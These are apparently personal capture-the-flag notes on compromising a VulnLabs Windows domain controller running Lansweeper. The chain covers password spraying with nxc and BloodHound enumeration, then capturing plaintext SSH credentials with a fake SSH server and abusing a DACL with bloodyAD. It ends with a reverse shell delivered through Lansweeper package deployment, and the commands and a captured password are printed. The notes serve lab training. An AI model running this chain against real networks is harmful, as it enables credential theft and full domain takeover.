Sweep

This is not a writeup, just my notes about VulnLabs machines.

Operating System: Windows Server 2022 Standard

Chain: False

Credentials

Username	Password	Method	Scope
intern	intern	Password Spraying	Domain Account + Lansweeper
svc_inventory_lnx	0|5m-U6?/uAX	SSH Sniffing	Domain Account + Lansweeper

✅ Valid Usernames

Guest
Administrator
INVENTORY$
fcla801
bcla614
jgar931
jgre808
hmar648
jwil197
grob171
jsmi791
fdav736
svc_inventory_lnx
intern
hjoh690
svc_inventory_win

🔑 Passwords list

intern
0|5m-U6?/uAX

Information Gathering

Nmap scan

# Nmap 7.94SVN scan initiated Mon Apr  7 18:26:14 2025 as: nmap -sS -p- -A --open -T5 -Pn -n -oN ext_sweep_tcp_allports -vvv 10.10.122.166
53/tcp    open  domain            syn-ack ttl 127 Simple DNS Plus
81/tcp    open  http              syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
82/tcp    open  ssl/http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
88/tcp    open  kerberos-sec      syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-07 22:30:43Z)
135/tcp   open  msrpc             syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn       syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap              syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?     syn-ack ttl 127
464/tcp   open  kpasswd5?         syn-ack ttl 127
593/tcp   open  ncacn_http        syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?          syn-ack ttl 127
3268/tcp  open  ldap              syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl? syn-ack ttl 127
3389/tcp  open  ms-wbt-server     syn-ack ttl 127 Microsoft Terminal Services
5357/tcp  open  http              syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5985/tcp  open  http              syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf            syn-ack ttl 127 .NET Message Framing
9524/tcp  open  ssl/unknown       syn-ack ttl 127
49664/tcp open  msrpc             syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc             syn-ack ttl 127 Microsoft Windows RPC
49675/tcp open  ncacn_http        syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49683/tcp open  msrpc             syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Service enumeration

DNS

• Not vulnerable to DNS Zone Transfer AXFR

SMB (enum4linux-ng)

Domain SID: S-1-5-21-4292653625-3348997472-4156797480

• Server allows null session authentication

• Server allows guest session authentication

  • RID-Bruteforce returned a list of valid usernames.

LDAP

• Not kerberoastable users.

• Not Asreproastable users.

Username as password bruteforce

❯ nxc smb 10.10.122.166 -u users.txt -p users.txt --no-bruteforce --continue-on-success
SMB         10.10.122.166   445    INVENTORY        [+] sweep.vl\intern:intern

Bloodhound enumeration

❯ bloodhound-python -c all --zip -u intern -p intern -d sweep.vl -ns 10.10.122.166
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: sweep.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 17 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: inventory.sweep.vl
INFO: Done in 00M 31S
INFO: Compressing output into 20250407184605_bloodhound.zip

Possible users with privilege escalation

• svc_inventory_lnx

• JGRE808

• svc_inventory_win

HTTP

LANSWEEPER v. 11.1.6.0

Lansweeper is an IT Asset Management (ITAM) platform that helps organizations discover, manage, and optimize their technology assets, providing visibility into IT, OT, and IoT assets, and enabling centralized IT inventory and management.

Valid Creeds: intern:intern

Exploitation

Capturing SSH credentials

Discovering SSH credentials stored in lansweeper

Lansweeper can scan more asset details with scanning credentials.

Mapping the SSH credentials to the Scan

The tester configured a Scanning Target and append the Linux credentials.

Setting up a Fake SSH service.

The tester run a fake ssh service to capture the svc_inventory_win plaintext credentials.

❯ go install github.com/fffaraz/fakessh@latest
❯ sudo setcap 'cap_net_bind_service=+ep' ~/go/bin/fakessh
❯ ~/go/bin/fakessh
2025/04/07 19:35:16.726181 10.10.122.166:51407 SSH-2.0-RebexSSH_5.0.8372.0 svc_inventory_lnx 0|5m-U6?/uAX

Abusing the DACL to obtain Remote Access

❯ bloodyAD -u 'svc_inventory_lnx' -p '0|5m-U6?/uAX' --dc-ip 10.10.122.166 add groupMember 'Lansweeper Admins' 'svc_inventory_lnx'
[+] svc_inventory_lnx added to Lansweeper Admins

❯ nxc winrm 10.10.122.166 -u 'svc_inventory_lnx' -p '0|5m-U6?/uAX'
WINRM       10.10.122.166   5985   INVENTORY        [*] Windows Server 2022 Build 20348 (name:INVENTORY) (domain:sweep.vl)
WINRM       10.10.122.166   5985   INVENTORY        [+] sweep.vl\svc_inventory_lnx:0|5m-U6?/uAX (Pwn3d!)

Domain Compromise

Adding a new Map Credentials

The tester utilized the new credentials to log into the application and configured a new set of credentials.

Creating a new package deployment to obtain reverse shell.

The tester accessed the Package deployment section and initiated the creation of a new package. Utilizing revshells.com, the tester generated a reverse shell, which was then triggered and sent to compromise the server as NT Authority System.